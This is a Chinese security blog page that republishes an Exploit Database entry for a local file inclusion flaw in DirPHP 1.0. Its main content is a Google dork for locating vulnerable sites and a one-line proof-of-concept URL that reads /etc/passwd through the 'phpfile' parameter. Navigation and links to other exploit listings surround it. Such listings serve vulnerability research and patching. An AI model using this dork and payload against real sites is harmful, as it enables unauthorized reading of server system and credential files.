体验盒子
  • 博文
  • 设计开发
  • 网络安全
  • 观点
  • 服务
  • AI导航
  • 更多
    • 关于
    • 分享
    • 老电影
    • 搜索语法/SHDB
    • Exploits
    • SecTools
    • UserAgent解析
    • 地理坐标在线转换

DirPHP 1.0 – Local File Inclusion

  • Exploit Database
  • 157 阅读
  • 作者: black hat
    日期: 2014-07-27
  • 类别:
    • webapps
    平台:
    • php
  • 来源:https://www.exploit-db.com/exploits/34173/
  • 1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    # Exploit Title: DirPHP - version 1.0 Local File Inclusion
    # Google Dork: intext:DirPHP - version 1.0 - Created & Maintained by Stuart
    Montgomery
    # Date: 7/26/14
    # Exploit Author: -Chosen-
    # Contact: dark[dot]binary[dot]code@gmail.com
    # Version: DirPHP - Version 1.0
    # Tested on: *nix
     
    PoC:
     
    http://site.com/path/index.php?phpfile=/etc/passwd
     
上一篇: Zenoss Monitoring System 4.2.5-2108 (x64) – Persistent Cross-Site Scripting
下一篇: WordPress Plugin FB Gorilla – ‘game_play.php’ SQL Injection
  • last Exploits
  • DirPHP 1.0 – Local File Inclusion的更多信息
  • PHP Lowbids – ‘viewfaqs.php’ Blind SQL Injection:
  • Sales and Inventory System for Grocery Store 1.0 – Multiple Stored XSS:
  • WordPress Plugin Netroics Blog Posts Grid 1.0 – Stored Cross-Site Scripting (XSS):
  • phpList 2.10.18 – ‘unconfirmed’ Cross-Site Scripting:
  • Joomla! Component com_bfsurvey_pro – ‘catid’ Blind SQL Injection:
  • OpenText Document Sciences xPression 4.5SP1 Patch 13 – ‘documentId’ SQL Injection:
  • ManageEngine EventLog Analyzer 10.0 – Information Disclosure:
  • E-Mail Security Virtual Appliance – ‘learn-msg.cgi’ Command Injection (Metasploit):
体验盒子
  • 关于
  • 博文
  • 分享
  • 存档
  • 服务
体验盒子所发布的一切资源仅限用于学习和研究目的。不得用于非法用途,否则,一切后果用户自负。

2024 体验盒子, 滇ICP备15006848号-1

扫码分享

网络安全
验证:体验盒子
扫码分享
网络安全
打赏零钱
  • 支付宝打赏
  • 微信打赏